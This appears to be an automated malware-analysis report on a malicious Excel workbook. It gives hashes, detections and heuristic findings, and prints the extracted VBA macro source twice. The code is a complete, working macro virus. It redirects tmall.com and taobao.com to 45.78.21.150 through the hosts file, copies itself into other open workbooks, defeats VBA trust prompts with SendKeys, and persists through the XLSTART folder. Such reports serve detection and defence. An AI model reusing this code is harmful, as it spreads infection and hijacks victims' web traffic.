Office (OLE) / .XLS malware analysis — malicious · f342b50ae6b05a05

MALICIOUS

Office (OLE) / .XLS

586.5 KB Created: 2019-11-23 07:35:48 Authoring application: Microsoft Excel First seen: 2026-06-17

MD5: 19f6b2b15f1c2e1beb03fbe309e89059 SHA-1: 92e8e9dbb242d6d03a385a568944d3b5db3404b8 SHA-256: f342b50ae6b05a05da213d284fdaa20338e4f38fbb1c3659d94d54743f70d2ef

188 Risk Score

Heuristics 5

ClamAV: Xls.Malware.Xanpei-9448553-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Xls.Malware.Xanpei-9448553-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATION

VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
Matched line in script
```
    ActiveWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule.InsertLines 2, WBstr
```
VBA copies the workbook into the Excel XLSTART startup folder high OLE_VBA_XLSTART_PERSISTENCE

The macro saves a copy of the workbook into Application.StartupPath (the Excel XLSTART folder) so the code auto-loads every time Excel starts. This is the persistence stage of a resident Excel macro virus, not normal document behaviour.
Matched line in script
```
pth = Application.StartupPath & "\accelerate.xls"
```

Workbook_Open macro low OLE_VBA_WBOPEN

Workbook_Open macro

Matched line in script

    ActiveWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule.InsertLines 150, "Sub Workbook_Open()"

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 6707 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	6707 bytes
SHA-256: `7787e700c31883a3c040f7c71b137372579d88c12932a2d204b1422a9dd8788b`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisWorkbook" Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Private Declare Function GetSystemDirectory Lib "kernel32" Alias "GetSystemDirectoryA" (ByVal lpBuffer As String, ByVal nSize As Long) As Long Private WithEvents App As Application Attribute App.VB_VarHelpID = -1 Sub OfficeCheck() Dim SysParh As String, Sysadd As String, t As String, sysadd1 As String SysParh = Space(256) GetSystemDirectory SysParh, 256 SysParh = Trim(SysParh) SysParh = Left(SysParh, Len(SysParh) - 1) SysParh = SysParh & "\drivers\etc\hosts" Sysadd = "45.78.21.150 www.tmall.com" sysadd1 = "#45.78.21.150 www.tmall.com" If Dir(SysParh) <> "" Then Open SysParh For Input As #1 t = Input(LOF(1), #1) Close #1 If InStr(t, Sysadd) <> 0 Then Open SysParh For Output As #1 t = Replace(t, sysadd1, Sysadd) t = Replace(t, "#45.78.21.150 www.taobao.com", "45.78.21.150 www.taobao.com") Print #1, t Close #1 End If If InStr(t, Sysadd) = 0 Then Open SysParh For Append As #1 Print #1, vbNewLine & Sysadd & vbNewLine & "45.78.21.150 www.taobao.com" Close #1 End If End If End Sub Sub runtimer() Application.OnTime Now + TimeValue("00:00:05"), "thisworkbook.p2d" End Sub Private Sub p2d() On Error Resume Next Debug.Print ThisWorkbook.VBProject.VBComponents("ThisWorkbook") If Err.Number = 1004 Then Err.Clear Application.SendKeys "%(qtmstv){ENTER}" DoEvents End If Dim WBstr$, Wb As Workbook With ThisWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule For i = 1 To 105 '.CountOfLines WBstr = WBstr & .Lines(i, 1) & Chr(10) Next End With If ActiveWorkbook.FileFormat = 52 Or ActiveWorkbook.FileFormat = 56 Then If ActiveWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule.CountOfLines = 0 Then ActiveWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule.InsertLines 2, WBstr ActiveWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule.InsertLines 150, "Sub Workbook_Open()" ActiveWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule.InsertLines 151, "Set App = Application" ActiveWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule.InsertLines 152, "End Sub" ActiveWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule.InsertLines 153, "Private Sub App_WorkbookOpen(ByVal Wb As Workbook)" ActiveWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule.InsertLines 154, "Call OfficeCheck" ActiveWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule.InsertLines 155, "Call d2p" ActiveWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule.InsertLines 156, "End Sub" End If End If End Sub Private Sub d2p() Dim pth As String Dim Exl As Excel.Application Dim WBstr$, fn$, Wb As Workbook Dim ws As Worksheet On Error Resume Next Debug.Print ThisWorkbook.VBProject.VBComponents("ThisWorkbook") If Err.Number = 1004 Then Err.Clear Application.SendKeys "%(qtmstv){ENTER}" DoEvents End If pth = Application.StartupPath & "\accelerate.xls" If Dir(pth) = "" Then Debug.Print ThisWorkbook.VBProject.VBComponents("ThisWorkbook") If Err.Number <> 1004 Then Workbooks.Add.SaveAs Filename:=pth, FileFormat:=18 Else Workbooks.Close End If Else Exit Sub End If Set Wb = Workbooks.Open(pth) With ThisWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule For i = 1 To 105 '.CountOfLines WBstr = WBstr & .Lines(i, 1) & Chr(10) Next End With If ActiveWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule.CountOfLines = 0 Then ActiveWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule.InsertLines 2, WBstr ActiveWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule.InsertLines 150, "Sub Workbook_Open()" ActiveWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule.InsertLines 151, "Set App = Application" ActiveWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule.InsertLines 152, "End Sub" ActiveWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule.InsertLines 153, "Private Sub App_WorkbookOpen(ByVal Wb As Workbook)" ActiveWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule.InsertLines 154, "Call OfficeCheck" ActiveWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule.InsertLines 155, "Call runtimer" ActiveWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule.InsertLines 156, "End Sub" End If ActiveWorkbook.IsAddin = True Wb.Save Wb.Close End Sub Sub Workbook_Open() Set App = Application End Sub Private Sub App_WorkbookOpen(ByVal Wb As Workbook) Call OfficeCheck Call d2p End Sub Attribute VB_Name = "Sheet1" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "Sheet2" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "Sheet3" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "Sheet4" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "Sheet5" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "Sheet6" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True

SHA-256: 7787e700c31883a3c040f7c71b137372579d88c12932a2d204b1422a9dd8788b

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Declare Function GetSystemDirectory Lib "kernel32" Alias "GetSystemDirectoryA" (ByVal lpBuffer As String, ByVal nSize As Long) As Long
Private WithEvents App As Application
Attribute App.VB_VarHelpID = -1
Sub OfficeCheck()
Dim SysParh As String, Sysadd As String, t As String, sysadd1 As String
SysParh = Space(256)
GetSystemDirectory SysParh, 256
SysParh = Trim(SysParh)
SysParh = Left(SysParh, Len(SysParh) - 1)
SysParh = SysParh & "\drivers\etc\hosts"
Sysadd = "45.78.21.150 www.tmall.com"
sysadd1 = "#45.78.21.150 www.tmall.com"
If Dir(SysParh) <> "" Then
Open SysParh For Input As #1
t = Input(LOF(1), #1)
Close #1
If InStr(t, Sysadd) <> 0 Then
Open SysParh For Output As #1
t = Replace(t, sysadd1, Sysadd)
t = Replace(t, "#45.78.21.150 www.taobao.com", "45.78.21.150 www.taobao.com")
Print #1, t
Close #1
End If
If InStr(t, Sysadd) = 0 Then
Open SysParh For Append As #1
Print #1, vbNewLine & Sysadd & vbNewLine & "45.78.21.150 www.taobao.com"
Close #1
End If
End If
End Sub
Sub runtimer()
Application.OnTime Now + TimeValue("00:00:05"), "thisworkbook.p2d"
End Sub
Private Sub p2d()
On Error Resume Next
Debug.Print ThisWorkbook.VBProject.VBComponents("ThisWorkbook")
If Err.Number = 1004 Then
Err.Clear
Application.SendKeys "%(qtmstv){ENTER}"
DoEvents
End If
   Dim WBstr$, Wb As Workbook
    With ThisWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule
        For i = 1 To 105 '.CountOfLines
            WBstr = WBstr & .Lines(i, 1) & Chr(10)
        Next
    End With
    If ActiveWorkbook.FileFormat = 52 Or ActiveWorkbook.FileFormat = 56 Then
    If ActiveWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule.CountOfLines = 0 Then
    ActiveWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule.InsertLines 2, WBstr
    ActiveWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule.InsertLines 150, "Sub Workbook_Open()"
    ActiveWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule.InsertLines 151, "Set App = Application"
    ActiveWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule.InsertLines 152, "End Sub"
    ActiveWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule.InsertLines 153, "Private Sub App_WorkbookOpen(ByVal Wb As Workbook)"
    ActiveWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule.InsertLines 154, "Call OfficeCheck"
    ActiveWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule.InsertLines 155, "Call d2p"
    ActiveWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule.InsertLines 156, "End Sub"
    End If
    End If
End Sub
Private Sub d2p()
Dim pth As String
Dim Exl As Excel.Application
Dim WBstr$, fn$, Wb As Workbook
Dim ws As Worksheet
On Error Resume Next
Debug.Print ThisWorkbook.VBProject.VBComponents("ThisWorkbook")
If Err.Number = 1004 Then
Err.Clear
Application.SendKeys "%(qtmstv){ENTER}"
DoEvents
End If
pth = Application.StartupPath & "\accelerate.xls"
If Dir(pth) = "" Then
Debug.Print ThisWorkbook.VBProject.VBComponents("ThisWorkbook")
If Err.Number <> 1004 Then
    Workbooks.Add.SaveAs Filename:=pth, FileFormat:=18
Else
    Workbooks.Close
End If
Else
    Exit Sub
End If
    Set Wb = Workbooks.Open(pth)
        With ThisWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule
        For i = 1 To 105 '.CountOfLines
            WBstr = WBstr & .Lines(i, 1) & Chr(10)
        Next
    End With
    If ActiveWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule.CountOfLines = 0 Then
    ActiveWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule.InsertLines 2, WBstr
    ActiveWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule.InsertLines 150, "Sub Workbook_Open()"
    ActiveWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule.InsertLines 151, "Set App = Application"
    ActiveWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule.InsertLines 152, "End Sub"
    ActiveWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule.InsertLines 153, "Private Sub App_WorkbookOpen(ByVal Wb As Workbook)"
    ActiveWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule.InsertLines 154, "Call OfficeCheck"
    ActiveWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule.InsertLines 155, "Call runtimer"
    ActiveWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule.InsertLines 156, "End Sub"
    End If
    ActiveWorkbook.IsAddin = True
    Wb.Save
    Wb.Close
End Sub




Sub Workbook_Open()
Set App = Application
End Sub
Private Sub App_WorkbookOpen(ByVal Wb As Workbook)
Call OfficeCheck
Call d2p
End Sub

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet4"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet5"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet6"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Open this report in the interactive analyzer, or submit your own file for analysis.